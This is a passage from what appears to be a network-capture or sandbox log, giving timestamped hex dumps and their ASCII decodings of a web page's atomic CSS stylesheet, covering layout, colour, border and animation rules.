                                                                                                                                                                        2023-06-02 11:13:21 UTC7INData Raw: 29 7b 68 65 69 67 68 74 3a 34 30 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 35 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 35 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 36 30 5c 25 5c 29 7b 68 65 69 67 68 74 3a 36 30 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 36 30 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 36 30 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 36 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 36 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 37 30 5c 25 5c 29 7b 68 65 69 67 68 74 3a 37 30 25 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 37 34 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 37 34 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 48 5c 28 38 30 70 78 5c 29 7b 68 65 69 67 68 74 3a 38 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4c 68 5c 28 2d 2d 66 6f 6e 74 2d 32 30 70
                                                                                                                                                                        Data Ascii: ){height:40%}#atomic .H\(50px\){height:50px}#atomic .H\(60\%\){height:60%}#atomic .H\(600px\){height:600px}#atomic .H\(60px\){height:60px}#atomic .H\(70\%\){height:70%}#atomic .H\(740px\){height:740px}#atomic .H\(80px\){height:80px}#atomic .Lh\(--font-20p
                                                                                                                                                                        2023-06-02 11:13:21 UTC8INData Raw: 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 31 30 70 78 5c 29 7b 74 6f 70 3a 32 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 32 30 70 78 5c 29 7b 74 6f 70 3a 32 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 34 30 70 78 5c 29 7b 74 6f 70 3a 32 34 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 36 30 70 78 5c 29 7b 74 6f 70 3a 32 36 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 36 35 70 78 5c 29 7b 74 6f 70 3a 32 36 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 37 30 70 78 5c 29 7b 74 6f 70 3a 32 37 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 32 38 35 70 78 5c 29 7b 74 6f 70 3a 32 38 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 33 30 30 70 78 5c 29 7b 74 6f 70 3a 33 30 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 54 5c
                                                                                                                                                                        Data Ascii: 0px}#atomic .T\(210px\){top:210px}#atomic .T\(220px\){top:220px}#atomic .T\(240px\){top:240px}#atomic .T\(260px\){top:260px}#atomic .T\(265px\){top:265px}#atomic .T\(270px\){top:270px}#atomic .T\(285px\){top:285px}#atomic .T\(300px\){top:300px}#atomic .T\
                                                                                                                                                                        2023-06-02 11:13:21 UTC9INData Raw: 3a 39 37 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 5c 23 37 65 31 66 66 66 5c 29 7b 66 69 6c 6c 3a 23 37 65 31 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 2d 2d 62 61 74 63 61 76 65 5c 29 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 2d 2d 62 61 74 74 6c 65 73 68 69 70 5c 29 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 62 61 74 74 6c 65 73 68 69 70 29 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 2d 2d 62 6c 61 63 6b 5c 29 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 62 6c 61 63 6b 29 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 2d 2d 77 68 69 74 65 5c 29 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 2e 6e 65 78 74 2d 62 74 6e 3a 64 69 73 61 62 6c 65 64 20 2e 6e 65 78
                                                                                                                                                                        Data Ascii: :970px}#atomic .Fill\(\#7e1fff\){fill:#7e1fff}#atomic .Fill\(--batcave\){fill:var(--batcave)}#atomic .Fill\(--battleship\){fill:var(--battleship)}#atomic .Fill\(--black\){fill:var(--black)}#atomic .Fill\(--white\){fill:var(--white)}.next-btn:disabled .nex
                                                                                                                                                                        2023-06-02 11:13:21 UTC10INData Raw: 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 32 29 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 35 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 76 61 72 28 2d 2d 65 6c 65 76 61 74 69 6f 6e 2d 35 29 7d 23 61 74 6f 6d 69 63 20 2e 43 75 72 5c 28 64 5c 29 7b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 7d 2e 63 6c 75 73 74 65 72 30 20 2e 63 6c 75 73 74 65 72 30 5f 44 5c 28 6e 5c 29 2c 2e 6d 6f 64 61 6c 2d 63 6c 6f 73 69 6e 67 20 2e 6d 6f 64 61 6c 2d 63 6c 6f 73 69 6e 67 5f 44 5c 28 6e 5c 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6c 75 73 74 65 72 31 20 2e 63
                                                                                                                                                                        Data Ascii: }#atomic .Bxsh\(--elevation-2\){box-shadow:var(--elevation-2)}#atomic .Bxsh\(--elevation-5\){box-shadow:var(--elevation-5)}#atomic .Cur\(d\){cursor:default}.cluster0 .cluster0_D\(n\),.modal-closing .modal-closing_D\(n\){display:none!important}.cluster1 .c
                                                                                                                                                                        2023-06-02 11:13:21 UTC12INData Raw: 3a 33 30 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 33 32 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 33 35 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 33 35 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 34 38 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 62 5c 28 35 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 7d 2e 77 61 66 65 72 2d 66 65 74 63 68 2d 63 6f 6d 70 6c 65 74 65 20 2e 77 61 66 65 72 2d 66 65 74 63 68 2d 63 6f 6d 70 6c 65 74 65 5f 4d 62 5c 28 32 30 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 30 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 77 61 66 65 72 2d 66
                                                                                                                                                                        Data Ascii: :300px}#atomic .Mb\(32px\){margin-bottom:32px}#atomic .Mb\(35px\){margin-bottom:35px}#atomic .Mb\(48px\){margin-bottom:48px}#atomic .Mb\(50px\){margin-bottom:50px}.wafer-fetch-complete .wafer-fetch-complete_Mb\(20px\){margin-bottom:20px!important}.wafer-f
                                                                                                                                                                        2023-06-02 11:13:21 UTC13INData Raw: 63 20 2e 45 6e 64 5c 28 31 38 70 78 5c 29 7b 72 69 67 68 74 3a 31 38 70 78 7d 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 20 2e 6d 6f 64 61 6c 2d 6f 70 65 6e 5f 4f 70 5c 28 31 5c 29 7b 6f 70 61 63 69 74 79 3a 31 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 4f 76 78 5c 28 68 5c 29 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 31 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 32 32 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 32 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 2d 2d 73 70 61 63 69 6e 67 2d 78 6c 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 73 70 61 63 69 6e 67 2d 78 6c 29 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 76 61 72 28
                                                                                                                                                                        Data Ascii: c .End\(18px\){right:18px}.modal-open .modal-open_Op\(1\){opacity:1!important}#atomic .Ovx\(h\){overflow-x:hidden}#atomic .P\(12px\){padding:12px}#atomic .P\(22px\){padding:22px}#atomic .Px\(--spacing-xl\){padding-left:var(--spacing-xl);padding-right:var(
                                                                                                                                                                        2023-06-02 11:13:21 UTC14INData Raw: 61 70 65 2d 6a 65 6c 6c 79 29 7d 23 61 74 6f 6d 69 63 20 2e 46 69 6c 6c 5c 28 2d 2d 69 6e 6b 77 65 6c 6c 5c 29 7b 66 69 6c 6c 3a 76 61 72 28 2d 2d 69 6e 6b 77 65 6c 6c 29 7d 23 61 74 6f 6d 69 63 20 2e 53 74 6b 5c 28 2d 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 5c 29 7b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 67 72 61 70 65 2d 6a 65 6c 6c 79 29 7d 23 61 74 6f 6d 69 63 20 2e 53 74 6b 5c 28 2d 2d 73 68 61 72 6b 5c 29 7b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 73 68 61 72 6b 29 7d 23 61 74 6f 6d 69 63 20 2e 53 74 6b 5c 28 2d 2d 77 68 69 74 65 5c 29 7b 73 74 72 6f 6b 65 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 23 61 74 6f 6d 69 63 20 2e 53 74 6b 77 5c 28 32 5c 29 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 7d 2e 4c 69 6e 65 43 6c 61 6d 70 5c 28 33 5c 2c 35 5c 2e 32
                                                                                                                                                                        Data Ascii: ape-jelly)}#atomic .Fill\(--inkwell\){fill:var(--inkwell)}#atomic .Stk\(--grape-jelly\){stroke:var(--grape-jelly)}#atomic .Stk\(--shark\){stroke:var(--shark)}#atomic .Stk\(--white\){stroke:var(--white)}#atomic .Stkw\(2\){stroke-width:2}.LineClamp\(3\,5\.2
                                                                                                                                                                        2023-06-02 11:13:21 UTC16INData Raw: 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 62 6c 75 72 70 6c 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 64 35 65 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6c 75 72 70 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 63 61 72 72 6f 74 2d 6a 75 69 63 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 35 32 30 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 61 72 72 6f 74 2d 6a 75 69 63 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 2d 2d 63 68 65 65 74 6f 73 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 36 65 30 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 68 65
                                                                                                                                                                        Data Ascii: )}#atomic .Bgc\(--blurple\){background-color:#5d5eff;background-color:var(--blurple)}#atomic .Bgc\(--carrot-juice\){background-color:#ff520d;background-color:var(--carrot-juice)}#atomic .Bgc\(--cheetos\){background-color:#ff6e0c;background-color:var(--che
                                                                                                                                                                        2023-06-02 11:13:21 UTC17INData Raw: 2c 2e 66 65 61 74 2d 6c 69 6e 6b 3a 68 6f 76 65 72 20 2e 66 65 61 74 2d 6c 69 6e 6b 5c 3a 68 5f 54 64 5c 28 75 5c 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 64 5c 28 75 5c 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 54 72 61 6e 73 6c 61 74 65 59 5c 28 2d 35 30 5c 25 5c 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 32 39 70 78 5c 29 7b 77 69 64 74 68 3a 31 32 39 70 78 7d 2e 4c 69 6e 65 43 6c 61 6d 70 5c 28 31 5c 2c 31 5c 2e 33 65 6d 5c 29 7b 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 2d 63 6c 61 6d 70 3a 31 3b 6d 61 78
                                                                                                                                                                        Data Ascii: ,.feat-link:hover .feat-link\:h_Td\(u\){text-decoration:underline!important}#atomic .Td\(u\){text-decoration:underline}#atomic .TranslateY\(-50\%\){transform:translateY(-50%)}#atomic .W\(129px\){width:129px}.LineClamp\(1\,1\.3em\){-webkit-line-clamp:1;max
                                                                                                                                                                        2023-06-02 11:13:21 UTC18INData Raw: 28 74 5c 29 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 62 63 5c 28 2d 2d 77 68 69 74 65 5c 29 5c 3a 5c 3a 61 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 73 74 61 72 74 63 5c 28 74 5c 29 5c 3a 5c 3a 61 3a 61 66 74 65 72 2c 23 61 74 6f 6d 69 63 20 2e 42 64 73 74 61 72 74 63 5c 28 74 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 64 74 73 5c 28 73 5c 29 5c 3a 5c 3a 61 3a 61
                                                                                                                                                                        Data Ascii: (t\){border-bottom-color:transparent}#atomic .Bdbc\(--white\)\:\:a:after{border-bottom-color:#fff;border-bottom-color:var(--white)}#atomic .Bdstartc\(t\)\:\:a:after,#atomic .Bdstartc\(t\)\:\:b:before{border-left-color:transparent}#atomic .Bdts\(s\)\:\:a:a
                                                                                                                                                                        2023-06-02 11:13:21 UTC19INData Raw: 23 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 5c 28 2d 2d 77 68 69 74 65 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d 77 68 69 74 65 29 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 42 67 63 5c 28 5c 23 66 66 66 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 66 32 66 32 66 34 5c 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 34 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 23 66 66 66 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 67 63 5c 28 5c 24 63 2d 66 75
                                                                                                                                                                        Data Ascii: #fff}#atomic .Bg\(--white\){background:#fff;background:var(--white)}.active .active_Bgc\(\#fff\){background-color:#fff!important}#atomic .Bgc\(\#f2f2f4\){background-color:#f2f2f4}#atomic .Bgc\(\#fff\)\:\:b:before{background-color:#fff}#atomic .Bgc\(\$c-fu
                                                                                                                                                                        2023-06-02 11:13:21 UTC21INData Raw: 2d 2d 62 6c 61 63 6b 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 6d 61 6c 69 62 75 5c 29 7b 63 6f 6c 6f 72 3a 23 66 66 30 30 38 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 6d 61 6c 69 62 75 29 7d 23 61 74 6f 6d 69 63 20 2e 43 6e 74 5c 28 5c 24 63 6f 6e 74 65 6e 74 53 70 61 63 65 5c 29 5c 3a 5c 3a 61 3a 61 66 74 65 72 2c 23 61 74 6f 6d 69 63 20 2e 43 6e 74 5c 28 5c 24 63 6f 6e 74 65 6e 74 53 70 61 63 65 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 44 5c 28 62 5c 29 2c 2e 64 65 6d 6f 74 65 2d 63 6f 6e 66 69 72 6d 2d 6f 70 65 6e 20 2e 64 65 6d 6f 74 65 2d 63 6f 6e 66 69 72 6d 2d 6f 70 65 6e 5f 44 5c 28 62 5c 29 2c 2e 6d 65 6e 75 2d 69 74 65 6d 2d 61 63 74 69 76 65 20 2e 6d
                                                                                                                                                                        Data Ascii: --black)}#atomic .C\(--malibu\){color:#ff0080;color:var(--malibu)}#atomic .Cnt\(\$contentSpace\)\:\:a:after,#atomic .Cnt\(\$contentSpace\)\:\:b:before{content:" "}.active .active_D\(b\),.demote-confirm-open .demote-confirm-open_D\(b\),.menu-item-active .m
                                                                                                                                                                        2023-06-02 11:13:21 UTC22INData Raw: 5c 29 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 65 6e 64 5c 28 32 36 70 78 5c 29 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 32 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 68 5c 28 38 36 70 78 5c 29 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 36 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 68 5c 28 39 36 5c 25 5c 29 7b 6d 61 78 2d 68 65 69 67 68 74 3a 39 36 25 7d 23 61 74 6f 6d 69 63 20 2e 4d 61 77 5c 28 35 39 31 70 78 5c 29 7b 6d 61 78 2d 77 69 64 74 68 3a 35 39 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 4d 69 77 5c 28 66 63 5c 29 7b 6d 69 6e 2d 77 69 64 74 68 3a 66 69 74 2d 63 6f 6e 74 65 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 54 5c 28 2d 38 70 78 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 74 6f 70 3a 2d 38 70 78 7d 23 61 74 6f
                                                                                                                                                                        Data Ascii: \){margin-top:22px}#atomic .Mend\(26px\){margin-right:26px}#atomic .Mah\(86px\){max-height:86px}#atomic .Mah\(96\%\){max-height:96%}#atomic .Maw\(591px\){max-width:591px}#atomic .Miw\(fc\){min-width:fit-content}#atomic .T\(-8px\)\:\:b:before{top:-8px}#ato
                                                                                                                                                                        2023-06-02 11:13:21 UTC23INData Raw: 6c 69 74 79 3a 76 69 73 69 62 6c 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 68 6f 72 74 63 75 74 4d 65 6e 75 50 61 6e 65 6c 2d 6f 70 65 6e 20 2e 73 68 6f 72 74 63 75 74 4d 65 6e 75 50 61 6e 65 6c 2d 6f 70 65 6e 5f 57 5c 28 31 30 30 76 77 5c 29 2c 2e 73 68 6f 72 74 63 75 74 4d 65 6e 75 50 61 6e 65 6c 2d 6f 70 65 6e 20 2e 73 68 6f 72 74 63 75 74 4d 65 6e 75 50 61 6e 65 6c 2d 6f 70 65 6e 5f 57 5c 28 31 30 30 76 77 5c 29 5c 3a 5c 3a 62 3a 62 65 66 6f 72 65 7b 77 69 64 74 68 3a 31 30 30 76 77 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 35 38 70 78 5c 29 7b 77 69 64 74 68 3a 31 35 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 31 38 70 78 5c 29 7b 77 69 64 74 68 3a 31 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 57 5c 28 32 35 30 70 78 5c
                                                                                                                                                                        Data Ascii: lity:visible!important}.shortcutMenuPanel-open .shortcutMenuPanel-open_W\(100vw\),.shortcutMenuPanel-open .shortcutMenuPanel-open_W\(100vw\)\:\:b:before{width:100vw!important}#atomic .W\(158px\){width:158px}#atomic .W\(18px\){width:18px}#atomic .W\(250px\
                                                                                                                                                                        2023-06-02 11:13:21 UTC24INData Raw: 23 61 74 6f 6d 69 63 20 2e 42 5c 28 36 35 70 78 5c 29 5c 21 2d 2d 6d 69 77 31 32 30 30 5b 63 6c 61 73 73 5d 7b 62 6f 74 74 6f 6d 3a 36 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 33 35 70 78 5c 29 5c 21 2d 2d 6d 69 77 31 32 30 30 5b 63 6c 61 73 73 5d 7b 70 61 64 64 69 6e 67 3a 33 35 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 23 61 74 6f 6d 69 63 20 2e 42 64 5c 28 30 5c 29 2c 2e 42 64 5c 28 30 5c 29 7b 62 6f 72 64 65 72 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 5c 28 6e 6f 6e 65 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 42 64 72 73 74 65 6e 64 5c 28 32 70 78 5c 29 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 72 69 67 68 74 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 61 74 6f 6d 69
                                                                                                                                                                        Data Ascii: #atomic .B\(65px\)\!--miw1200[class]{bottom:65px!important}#atomic .P\(35px\)\!--miw1200[class]{padding:35px!important}}#atomic .Bd\(0\),.Bd\(0\){border:0}#atomic .Bdend\(none\){border-right:none}#atomic .Bdrstend\(2px\){border-top-right-radius:2px}#atomi
                                                                                                                                                                        2023-06-02 11:13:21 UTC26INData Raw: 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 23 61 74 6f 6d 69 63 20 2e 50 62 5c 28 31 31 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 31 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 73 74 61 72 74 5c 28 32 37 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 37 70 78 7d 2e 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 2e 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 5c 3a 66 5f 54 64 5c 28 6e 5c 29 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 20 2e 6a 73 2d 73 74 72 65 61 6d 2d 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 5c 3a 66 5f 54 64 5c 28 75 5c 29
                                                                                                                                                                        Data Ascii: flow:visible}#atomic .Pb\(11px\){padding-bottom:11px}#atomic .Pstart\(27px\){padding-left:27px}.js-stream-content-link:focus .js-stream-content-link\:f_Td\(n\){text-decoration:none!important}.js-stream-content-link:focus .js-stream-content-link\:f_Td\(u\)
                                                                                                                                                                        2023-06-02 11:13:21 UTC27INData Raw: 6d 69 63 20 2e 41 69 5c 28 73 5c 29 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 7d 23 61 74 6f 6d 69 63 20 2e 41 63 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 41 73 5c 28 63 5c 29 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 63 65 6e 74 65 72 7d 23 61 74 6f 6d 69 63 20 2e 41 73 5c 28 66 65 5c 29 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65 78 2d 65 6e 64 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 41 6e 69 6d 64 75 72 5c 28 35 30 30 30 6d 73 5c 29 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 35 73 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 63 74 69 76 65 20 2e 61 63 74 69 76 65 5f 41 6e 69 6d 6e 5c 28 5c 24 63 61 72 6f 75 73 65 6c 41 6e 69 6d 61 74 69 6f 6e 4e 61 6d 65 5c
                                                                                                                                                                        Data Ascii: mic .Ai\(s\){align-items:start}#atomic .Ac\(c\){align-content:center}#atomic .As\(c\){align-self:center}#atomic .As\(fe\){align-self:flex-end}.active .active_Animdur\(5000ms\){animation-duration:5s!important}.active .active_Animn\(\$carouselAnimationName\
                                                                                                                                                                        2023-06-02 11:13:21 UTC28INData Raw: 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 66 36 39 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 63 2d 66 75 6a 69 2d 64 69 72 74 79 2d 73 65 61 67 75 6c 6c 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 63 2d 66 75 6a 69 2d 67 72 65 79 2d 63 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 73 74 72 65 61 6d 48 6f 76 65 72 43 6c 61 73 73 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 37 38 66 66 7d 23 61 74 6f 6d 69 63 20 2e 42 64 63 5c 28 5c 24 73 74 72 65 61 6d 54 6f 6f 6c 74 69 70 42 6f 72 64 65 72 43 6f 6c 6f 72 5c 29 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 33 34 2c 32 35 2c 32 35 2c 2e 33 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64
                                                                                                                                                                        Data Ascii: {border-color:#0f69ff}#atomic .Bdc\(\$c-fuji-dirty-seagull\),#atomic .Bdc\(\$c-fuji-grey-c\){border-color:#e0e4e9}#atomic .Bdc\(\$streamHoverClass\){border-color:#0078ff}#atomic .Bdc\(\$streamTooltipBorderColor\){border-color:rgba(34,25,25,.3)}#atomic .Bd
                                                                                                                                                                        2023-06-02 11:13:21 UTC30INData Raw: 2d 63 6f 6c 6f 72 3a 23 66 30 66 33 66 35 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 67 72 65 79 2d 68 61 69 72 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 37 65 31 66 66 66 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 68 75 6c 6b 2d 70 61 6e 74 73 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 70 65 62 62 6c 65 5c 29 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 23 63 37 63 64 64 32 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 70 65 62 62 6c 65 29 7d 23 61 74 6f 6d 69 63 20 2e 42 64 65 6e 64 63 5c 28 2d 2d 77
